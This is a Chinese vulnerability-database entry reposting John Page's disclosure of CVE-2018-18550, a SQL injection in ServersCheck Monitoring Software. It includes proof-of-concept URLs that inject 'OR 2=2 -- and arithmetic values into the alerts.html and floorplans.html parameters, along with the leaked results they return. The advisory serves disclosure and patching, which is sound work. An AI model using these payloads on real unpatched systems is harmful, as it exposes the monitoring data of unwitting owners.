ServersCheck Monitoring Software SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1364762 漏洞类型 SQL注入
发布时间 2018-10-29 更新时间 2018-10-29
CVE编号 CVE-2018-18550 CNNVD-ID CNNVD-201810-1115
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018100243
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201810-1115
|漏洞详情
ServersCheck Monitoring Software是比利时ServersCheck的一套基于浏览器的网络检测工具。该工具能够监测、报告,并对系统的性能和可靠性等问题作出预警。 ServersCheck Monitoring Software 14.3.4之前版本中存在SQL注入漏洞。远程攻击者可利用该漏洞执行任意的SQL命令。
|漏洞EXP
[+] Credits: John Page (aka hyp3rlinx)		
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/CVE-2018-18550-SERVERSCHECK-MONITORING-SOFTWARE-SQL-INJECTION.txt
[+] ISR: ApparitionSec          
 
Greetz: ***Greetz: indoushka | Eduardo B.***


[Vendor]
www.serverscheck.com


[Product]
ServersCheck Monitoring Software - through 14.3.3

Software for monitoring your edge computing infrastructure, network & servers.

http://downloads.serverscheck.com/monitoring_software/setup.exe
File hash: b7bffe4fc83b6a4586c099d6c62d8eeb



[Vulnerability Type]
SQL Injection



[CVE Reference]
CVE-2018-18550


[Security Issue]
ServersCheck Monitoring Software allows for SQL Injection by an authenticated user via the alerts.html "id" parameter.



[References]
https://serverscheck.com/monitoring-software/release.asp



[Exploit/POC]
http://127.0.0.1:1272/alerts.html?id=18391

Result:
Alerts History for SENSORXY
No data available in table

Then using 'OR+2=2,

http://127.0.0.1:1272/alerts.html?id=18391+'OR+2=2+--+

Result:

Alerts History for test
155 	a day ago 	CPU on 127.0.0.1 	Status Change 	DOWN to OK 	
154 	a day ago 	CPU on 127.0.0.1 	Status Change 	OK to DOWN 	
153 	a day ago 	test 	Status Change 	OK to DOWN 	Unable to connect to host


SQL Injection - original page results successfully manipulated using 18391-2
-----------------------------------------------------------------------------

Examples:

http://127.0.0.1:1272/alerts.html?id=18391
No data available in table

Then using 34 minus 2,

http://127.0.0.1:1272/alerts.html?id=18391-2
153 	a day ago 	test 	Status Change 	OK to DOWN 	Unable to connect to host

and minus 1,

http://127.0.0.1:1272/alerts.html?id=18391-1
155 	a day ago 	CPU on 127.0.0.1 	Status Change 	DOWN to OK 	
154 	a day ago 	CPU on 127.0.0.1 	Status Change 	OK to DOWN


http://127.0.0.1:1272/floorplans.html?floorplan=34
Floor Plan PLANXY

Then using 34 minus 2,

http://127.0.0.1:1272/floorplans.html?floorplan=34-2
Floor Plan 0 



[Network Access]
Remote



[Severity]
High


[Disclosure Timeline]
Vendor Notification: October 6, 2018
Vendor acknowledgement: October 7, 2018
Vendor release v14.3.4 : October 7th, 2018 
CVE assign by Mitre: October 21, 2018
October 22, 2018 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
|参考资料

来源:serverscheck.com

链接:https://serverscheck.com/monitoring-software/release.asp